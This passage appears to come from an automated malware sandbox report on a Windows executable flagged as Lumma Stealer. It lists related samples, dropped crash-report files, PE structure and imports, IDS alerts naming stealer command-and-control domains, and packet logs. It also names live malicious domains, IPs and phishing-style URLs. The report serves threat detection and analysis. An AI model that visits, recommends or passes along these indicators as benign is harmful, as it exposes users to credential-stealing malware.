	9idglWFv95.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	tJd3ArrDAm.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
s-part-0035.t-0009.t-msedge.net	zox1oNM5Xl.exe	Get hash	malicious	Unknown	Browse	13.107.246.63
	JA7cOAGHym.exe	Get hash	malicious	Vidar	Browse	13.107.246.63
	OTRykEzo6o.exe	Get hash	malicious	Unknown	Browse	13.107.246.63
	wceaux.dll.dll	Get hash	malicious	Unknown	Browse	13.107.246.63
	wp.bat	Get hash	malicious	Unknown	Browse	13.107.246.63
	https://online-ops.mypasschange.com/landingPage/2/fbb0559ebe1911efb53c0242ac190102	Get hash	malicious	Unknown	Browse	13.107.246.63
	RDb082EApV.exe	Get hash	malicious	LummaC	Browse	13.107.246.63
	GnHq2ZaBUl.exe	Get hash	malicious	LummaC	Browse	13.107.246.63
	EwhnoHx0n5.exe	Get hash	malicious	Unknown	Browse	13.107.246.63
	onaUtwpiyq.exe	Get hash	malicious	LummaC	Browse	13.107.246.63

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AKAMAI-ASUS	JA7cOAGHym.exe	Get hash	malicious	Vidar	Browse	23.57.90.162
	grand-theft-auto-5-theme-1-installer_qb8W-j1.exe	Get hash	malicious	Unknown	Browse	95.100.135.104
	db0fa4b8db0333367e9bda3ab68b8042.m68k.elf	Get hash	malicious	Mirai, Gafgyt	Browse	104.73.204.126
	db0fa4b8db0333367e9bda3ab68b8042.spc.elf	Get hash	malicious	Mirai, Gafgyt	Browse	104.120.124.62
	pVbAZEFIpI.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	GxX48twWHA.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	RUUSfr6dVm.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	9idglWFv95.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	tJd3ArrDAm.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	gdtJGo7jH3.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
CLOUDFLARENETUS	Wvo9FU4qo9.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	JA7cOAGHym.exe	Get hash	malicious	Vidar	Browse	172.64.41.3
	T4qO1i2Jav.exe	Get hash	malicious	LummaC Stealer	Browse	172.64.41.3
	EB2UOXRNsE.exe	Get hash	malicious	Unknown	Browse	104.21.112.1
	FXdg37pY22.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.66.86
	gshv2.exe	Get hash	malicious	Unknown	Browse	162.159.129.233
	OiMp3TH.exe	Get hash	malicious	LummaC	Browse	172.67.216.236
	https://dnsextension.pro/invoice/d2d0bf8701b34bc296ca83b956c10720	Get hash	malicious	Unknown	Browse	104.21.31.138
	k0ukcEH.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	appFile.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.94.92

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	Wvo9FU4qo9.exe	Get hash	malicious	LummaC	Browse	172.67.157.254 104.121.10.34
	T4qO1i2Jav.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.157.254 104.121.10.34
	FXdg37pY22.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.157.254 104.121.10.34
	FXdg37pY22.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.157.254 104.121.10.34
	OiMp3TH.exe	Get hash	malicious	LummaC	Browse	172.67.157.254 104.121.10.34
	k0ukcEH.exe	Get hash	malicious	LummaC	Browse	172.67.157.254 104.121.10.34
	https://online-ops.mypasschange.com/landingPage/2/fbb0559ebe1911efb53c0242ac190102	Get hash	malicious	Unknown	Browse	172.67.157.254 104.121.10.34
	appFile.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.157.254 104.121.10.34
	FloydMounts.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.157.254 104.121.10.34
	RDb082EApV.exe	Get hash	malicious	LummaC	Browse	172.67.157.254 104.121.10.34

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_IzDjbVdHha.exe_1227802bef51cff559c46f51f543e565ca06f23_6beaad20_8e938bb1-c38c-461b-83e9-d748ba6b0504\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0653088212081572
Encrypted:	false
SSDEEP:	192:B0EsjMl0Zzyh/ju3mFizuiFPZ24IO8X+:hsjMGZ+h/jLizuiFPY4IO8X+
MD5:	DD2CC7DA290059CF063B14CFA527AD9B
SHA1:	6ADDEA5AD33B8D57B68AC2AC894553E8A1ECBB99
SHA-256:	30CAE52154DF20CD3EE05A876E999EA435B59F035FA15AE1B4B090287CBA17C9
SHA-512:	DE2C9C7FB04AEBD38A8BC4734022EF44FE0F3EDCCF2C46D9358CD823B4EFC6CCFC6CD9FC52A93A8A8AECA98EF887D190D969FF24CD3A388F07F6A97CE9439C47
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.7.8.1.2.1.7.7.3.1.9.3.3.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.7.8.1.2.1.8.3.4.1.3.0.7.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.e.9.3.8.b.b.1.-.c.3.8.c.-.4.6.1.b.-.8.3.e.9.-.d.7.4.8.b.a.6.b.0.5.0.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.6.7.8.7.d.6.b.-.2.b.6.a.-.4.5.4.6.-.8.9.2.e.-.d.9.c.7.2.4.e.6.7.2.2.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.I.z.D.j.b.V.d.H.h.a...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.0.f.8.-.0.0.0.1.-.0.0.1.5.-.3.3.9.5.-.0.c.a.b.6.6.5.8.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.f.1.5.f.f.4.a.1.b.3.b.c.b.e.c.c.6.d.0.c.7.d.a.1.f.3.a.f.f.8.e.0.0.0.0.f.f.f.f.!.0.0.0.0.0.9.8.9.9.4.b.7.e.0.e.a.7.1.9.1.b.c.8.c.4.0.a.0.f.5.a.9.2.f.0.e.0.8.9.2.0.6.3.1.!.I.z.D.j.b.V.d.H.h.a...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB878.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Fri Dec 27 13:53:38 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	107898
Entropy (8bit):	2.187800798558392
Encrypted:	false
SSDEEP:	384:iwnCxTBx7qiCcWsXSn/AagA3r3XIsqO1v0TYL0Oq3yt6fKurzd7vpTbjB:iwniTBxmPcDCBh1CzdFTfB
MD5:	E29FA5285B34080C4F84FEC444CAD70B
SHA1:	E9A93C83E67C5EB4AB382A49FBCB9B4669F655AE
SHA-256:	4F949B6CE36194CBF4574F87EBC20F913650D9723B1940124E183F91E814F50D
SHA-512:	F27EA85396B485AD34F4A2EC8E334FBE3E32B45121E3C247DA6C61651C1FE3ACE6479ED16836B898B8A277819AF35B38EEBA93EF708B6A1EE7502A4EFA24DA53
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......b.ng........................p...........,...h$......t....Q..........`.......8...........T............F...^...........%...........'..............................................................................eJ.......(......GenuineIntel............T...........G.ng.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB9B2.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8428
Entropy (8bit):	3.6999894593378984
Encrypted:	false
SSDEEP:	192:R6l7wVeJiL6I3aO6Y2DRSU9fgmfWBFrpDO89bP3sfEAlm:R6lXJW6IqO6YcSU9fgmfWdP8f6
MD5:	5454891FAF7948031A5B71DBA974480D
SHA1:	8DA04B6AC79C93B88129AA05A7EA85E0CE7F86C7
SHA-256:	787FBCB418F70FED327C41CD51C85609A1C6B4D506DC9C1E50568551DA80ADED
SHA-512:	61A3AE5ABD148504AB6E318B0CF049373D0C8BD77E82FFDBFAA50ABEE39BD5BC80F08AC464E2EA86E2E6C288E4C04FE409373918803E498035110FFCD6D317A1
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.3.4.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB9F1.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4724
Entropy (8bit):	4.490844417894766
Encrypted:	false
SSDEEP:	48:cvIwWl8zsVJg77aI9uZWpW8VYsYm8M4JpK4O3FCF+q8voK4O/r2Nz0Ed:uIjfvI7Io7VMJtzFKMgroz0Ed
MD5:	7D713110BC7CFAB783C2FC003D8735D5
SHA1:	41F357396F5504E97C4DA2A6F23759A9FABE0568
SHA-256:	5D4A204F78DBF3F1FEE299089560A3661F77F63D0D796A9E48F570B65ABDF55E
SHA-512:	14093D3F0CF8FD5B8D48E49DB05600DCB687EE4A004FAC466A417FCFC2D3F90061E0DC752B77B072293BDF2FE5A73586CAD4E317C9138494A571303B78969F70
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="649736" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.468592887117594
Encrypted:	false
SSDEEP:	6144:UzZfpi6ceLPx9skLmb0f4ZWSP3aJG8nAgeiJRMMhA2zX4WABluuNmjDH5S:aZHt4ZWOKnMM6bFpoj4
MD5:	E537DDEB8A125486EF77C08F2EC6D6EF
SHA1:	5B201CCCD0106057B72F9251D6C9B00E5E727078
SHA-256:	CDF2A38FAC546842FF21EC77ED18E511199A01B0B480CA3A35D8341FBF817542
SHA-512:	F00DD78CE00D780CF69024D5062583D2830A5FB73EC83F4D62C33121D8279F7DF798F7850A809C73C5B2ADAD42F2E51AC33F88E2B397D8D2AD55F7B01F5A7D38
Malicious:	false
Reputation:	low
Preview:	regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..y.fX..............................................................................................................................................................................................................................................................................................................................................b.o.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.64870687060275
TrID:	Win32 Executable (generic) a (10002005/4) 99.53% InstallShield setup (43055/19) 0.43% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	IzDjbVdHha.exe
File size:	356'352 bytes
MD5:	b740dd94027c29d447f10e96c3e361ee
SHA1:	098994b7e0ea7191bc8c40a0f5a92f0e08920631
SHA256:	b49e5f7e327ad28148d795bffecde8864c77e2f349bac3b199a15de0832c201e
SHA512:	44f94c2694a4eb535b5700f534410836eaa1f6f9e02be0f1efa5a088e63ba2c094b96c33dc7142f6f142a22e9431eaf0165f27449b7380290ca4c6f5f47e1cdf
SSDEEP:	6144:E1qVwT/IvXuEkesfqE5QJ4Ah5FfcQiFuLphENehvrGuhxiPW:fVE/Ivevq+i5BcfFucYBhxiPW
TLSH:	AA74BE1079F19025EFFF9B311A7896E46A7B7C636A7084BE2290321F1D732914E6172F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......).`.mq..mq..mq...>..oq..s#..sq..s#..yq..s#...q..J.u.jq..mq...q..s#..lq..s#..lq..s#..lq..Richmq..................PE..L......e...

File Icon


Icon Hash:	8f97310d3125191a

Static PE Info

General

Entrypoint:	0x4016ae
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6593E2C5 [Tue Jan 2 10:17:41 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	d065fa740a2c8d17b532c1e142f53632

Entrypoint Preview

Instruction
call 00007F83D0C91564h
jmp 00007F83D0C8DB6Dh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [00446C18h], eax
mov dword ptr [00446C14h], ecx
mov dword ptr [00446C10h], edx
mov dword ptr [00446C0Ch], ebx
mov dword ptr [00446C08h], esi
mov dword ptr [00446C04h], edi
mov word ptr [00446C30h], ss
mov word ptr [00446C24h], cs
mov word ptr [00446C00h], ds
mov word ptr [00446BFCh], es
mov word ptr [00446BF8h], fs
mov word ptr [00446BF4h], gs
pushfd
pop dword ptr [00446C28h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [00446C1Ch], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [00446C20h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [00446C2Ch], eax
mov eax, dword ptr [ebp-00000320h]
mov dword ptr [00446B68h], 00010001h
mov eax, dword ptr [00446C20h]
mov dword ptr [00446B1Ch], eax
mov dword ptr [00446B10h], C0000409h
mov dword ptr [00446B14h], 00000001h
mov eax, dword ptr [00444004h]
mov dword ptr [ebp-00000328h], eax
mov eax, dword ptr [00444008h]
mov dword ptr [ebp-00000324h], eax
call dword ptr [000000C8h]

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x4285c	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x422000	0xe710	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x41000	0x19c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x3f13c	0x3f200	3a78aa2bf83fbc57ed6e96b4b4c69721	False	0.803960396039604	data	7.370875737997095	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x41000	0x21a2	0x2200	079e5b42b472f8aa9935ffbb758e1eb1	False	0.3642003676470588	data	5.551014945234657	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x44000	0x3dd118	0x7000	b5800429ce8c036268824b954c4c2008	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x422000	0xe710	0xe800	374c59a419fe05d96c0f0f0325e1d966	False	0.4041453394396552	data	4.486301858913421	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_CURSOR	0x428e18	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0	0.4276315789473684
RT_CURSOR	0x428f60	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0	0.7368421052631579
RT_CURSOR	0x429090	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	0.06130705394190871
RT_ICON	0x4225e0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	0.5567697228144989
RT_ICON	0x423488	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	0.6173285198555957
RT_ICON	0x423d30	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	0.6440092165898618
RT_ICON	0x4243f8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	0.6748554913294798
RT_ICON	0x424960	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	0.4382780082987552
RT_ICON	0x426f08	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	0.5119606003752345
RT_ICON	0x427fb0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	0.5147540983606558
RT_ICON	0x428938	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	0.6161347517730497
RT_STRING	0x42b818	0x44e	data	0.4500907441016334
RT_STRING	0x42bc68	0x126	data	0.5238095238095238
RT_STRING	0x42bd90	0x656	data	0.436498150431566
RT_STRING	0x42c3e8	0x74c	data	0.43147751605995716
RT_STRING	0x42cb38	0x6a4	data	0.4376470588235294
RT_STRING	0x42d1e0	0x74c	data	0.4229122055674518
RT_STRING	0x42d930	0x70e	data	0.4330011074197121
RT_STRING	0x42e040	0x84e	data	0.4195672624647225
RT_STRING	0x42e890	0x662	data	0.43512851897184823
RT_STRING	0x42eef8	0x964	data	0.4068219633943428
RT_STRING	0x42f860	0x66e	data	0.4356014580801944
RT_STRING	0x42fed0	0x60a	data	0.444372574385511
RT_STRING	0x4304e0	0x22a	data	0.47653429602888087
RT_GROUP_CURSOR	0x428f48	0x14	data	1.15
RT_GROUP_CURSOR	0x42b638	0x22	data	1.088235294117647
RT_GROUP_ICON	0x428da0	0x76	data	0.6610169491525424
RT_VERSION	0x42b660	0x1b4	data	0.5711009174311926

Imports

DLL	Import
KERNEL32.dll	SetDefaultCommConfigA, SetUnhandledExceptionFilter, InterlockedDecrement, GetEnvironmentStringsW, GetComputerNameW, GetModuleHandleW, GetDateFormatA, LoadLibraryW, GetConsoleMode, ReadProcessMemory, DeleteVolumeMountPointW, GetTimeFormatW, GetConsoleAliasW, CreateProcessA, GetAtomNameW, GetStartupInfoW, GetShortPathNameA, SetLastError, GetProcAddress, PulseEvent, SetFileAttributesA, GetNumaHighestNodeNumber, LoadLibraryA, InterlockedExchangeAdd, LocalAlloc, AddAtomA, FoldStringW, SetLocaleInfoW, RequestWakeupLatency, BuildCommDCBA, WriteConsoleOutputAttribute, FindFirstVolumeA, FindAtomW, UnregisterWaitEx, OpenFileMappingA, CreateFileA, WriteConsoleW, SearchPathA, GetCommandLineW, MultiByteToWideChar, GetLastError, HeapReAlloc, HeapAlloc, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, IsDebuggerPresent, GetCPInfo, InterlockedIncrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapCreate, VirtualFree, HeapFree, VirtualAlloc, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, InitializeCriticalSectionAndSpinCount, RtlUnwind, HeapSize, ReadFile, GetConsoleCP, FlushFileBuffers, SetFilePointer, SetStdHandle, CloseHandle, WriteConsoleA, GetConsoleOutputCP, GetModuleHandleA
USER32.dll	GetClassLongW
GDI32.dll	GetBitmapBits

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-27T14:53:16.812482+0100	2058486	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (driblbemris .lat)	1	192.168.2.6	64596	1.1.1.1	53	UDP
2024-12-27T14:53:17.380557+0100	2058364	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat)	1	192.168.2.6	56432	1.1.1.1	53	UDP
2024-12-27T14:53:17.603367+0100	2058360	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat)	1	192.168.2.6	60290	1.1.1.1	53	UDP
2024-12-27T14:53:17.991744+0100	2058370	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacebudi .lat)	1	192.168.2.6	54193	1.1.1.1	53	UDP
2024-12-27T14:53:18.379044+0100	2058362	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (energyaffai .lat)	1	192.168.2.6	52984	1.1.1.1	53	UDP
2024-12-27T14:53:18.896295+0100	2058354	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat)	1	192.168.2.6	65480	1.1.1.1	53	UDP
2024-12-27T14:53:19.128896+0100	2058376	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sustainskelet .lat)	1	192.168.2.6	49675	1.1.1.1	53	UDP
2024-12-27T14:53:19.359483+0100	2058358	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crosshuaht .lat)	1	192.168.2.6	58652	1.1.1.1	53	UDP
2024-12-27T14:53:19.674742+0100	2058374	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat)	1	192.168.2.6	61991	1.1.1.1	53	UDP
2024-12-27T14:53:21.860751+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49731	104.121.10.34	443	TCP
2024-12-27T14:53:23.040117+0100	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.6	49731	104.121.10.34	443	TCP
2024-12-27T14:53:24.804707+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49741	172.67.157.254	443	TCP
2024-12-27T14:53:25.563223+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	49741	172.67.157.254	443	TCP
2024-12-27T14:53:25.563223+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49741	172.67.157.254	443	TCP
2024-12-27T14:53:26.850823+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49747	172.67.157.254	443	TCP
2024-12-27T14:53:27.619073+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.6	49747	172.67.157.254	443	TCP
2024-12-27T14:53:27.619073+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49747	172.67.157.254	443	TCP
2024-12-27T14:53:30.177712+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49754	172.67.157.254	443	TCP
2024-12-27T14:53:31.128542+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.6	49754	172.67.157.254	443	TCP
2024-12-27T14:53:33.196821+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49766	172.67.157.254	443	TCP
2024-12-27T14:53:36.404937+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49775	172.67.157.254	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 14:53:20.290908098 CET	49731	443	192.168.2.6	104.121.10.34
Dec 27, 2024 14:53:20.290972948 CET	443	49731	104.121.10.34	192.168.2.6
Dec 27, 2024 14:53:20.291143894 CET	49731	443	192.168.2.6	104.121.10.34
Dec 27, 2024 14:53:20.294095993 CET	49731	443	192.168.2.6	104.121.10.34
Dec 27, 2024 14:53:20.294111013 CET	443	49731	104.121.10.34	192.168.2.6
Dec 27, 2024 14:53:21.860359907 CET	443	49731	104.121.10.34	192.168.2.6
Dec 27, 2024 14:53:21.860750914 CET	49731	443	192.168.2.6	104.121.10.34
Dec 27, 2024 14:53:21.878695011 CET	49731	443	192.168.2.6	104.121.10.34
Dec 27, 2024 14:53:21.878717899 CET	443	49731	104.121.10.34	192.168.2.6
Dec 27, 2024 14:53:21.879039049 CET	443	49731	104.121.10.34	192.168.2.6
Dec 27, 2024 14:53:21.928700924 CET	49731	443	192.168.2.6	104.121.10.34
Dec 27, 2024 14:53:22.235614061 CET	49731	443	192.168.2.6	104.121.10.34
Dec 27, 2024 14:53:22.279340982 CET	443	49731	104.121.10.34	192.168.2.6
Dec 27, 2024 14:53:23.040146112 CET	443	49731	104.121.10.34	192.168.2.6
Dec 27, 2024 14:53:23.040173054 CET	443	49731	104.121.10.34	192.168.2.6
Dec 27, 2024 14:53:23.040239096 CET	49731	443	192.168.2.6	104.121.10.34
Dec 27, 2024 14:53:23.040251017 CET	443	49731	104.121.10.34	192.168.2.6
Dec 27, 2024 14:53:23.040258884 CET	443	49731	104.121.10.34	192.168.2.6
Dec 27, 2024 14:53:23.040261984 CET	443	49731	104.121.10.34	192.168.2.6
